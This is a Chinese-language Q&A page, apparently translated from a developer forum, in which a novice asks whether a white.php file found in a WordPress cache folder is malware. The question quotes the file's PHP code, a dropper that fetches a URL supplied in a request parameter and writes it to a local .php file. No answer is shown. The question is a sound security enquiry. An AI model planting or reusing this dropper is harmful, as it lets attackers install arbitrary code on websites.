wordpress - 我在 Wordpress 网站的缓存文件夹中的 white.php 文件中找到了这段代码
问题描述
我在 /upload/cache Wordpress 文件夹中找到了 white.php 文件。它包含以下代码:
<?php
$name = '68aa884d96d2e824669d2d.php';
$ch = curl_init ($_REQUEST['68aa884d96d2e824669d2d']);
$fp = fopen ($name, "w+");
curl_setopt ($ch, CURLOPT_FILE, $fp);
$ult = curl_exec ($ch);
curl_close ($ch);
fclose ($fp);
if(!$ult){
$f = file_get_contents($_REQUEST['68aa884d96d2e824669d2d']);
file_put_contents($name,$f);
}
我是一个新手开发人员,我想知道这是否是恶意软件代码,如果是,我该如何调查这个问题。
谢谢你。
解决方案
推荐阅读
- rust - 在 x86_64-pc-windows-gnu 上编译 curl-sys 失败,未定义对 '__imp___acrt_iob_func' 的引用
- python - 如何将 beautifulsoup 的输出附加到 pandas 数据框
- reactjs - 替换和推送仍然无法在同一页面上工作
- scala - scala:使用常量键创建一个元组序列
- rollupjs - rollup-js 与 rollup-plugin-multi-entry - 多个文件输出/具有重复常量名称的问题
- c# - 如何使用分区以使用 .NET Core C# 并行使用 kafka 中的一个主题?
- opayo - 直接协议 4.00:PDS2 - 5083:回调中提供的 VpsTxId 与 CRes 中的事务不匹配
- python - 将复数数组传递到 PyCUDA 内核
- java - 使用 Lombok 的类层次结构的 Common Builder 基实例
- ios - 新的 Apple ID 登录无效授权问题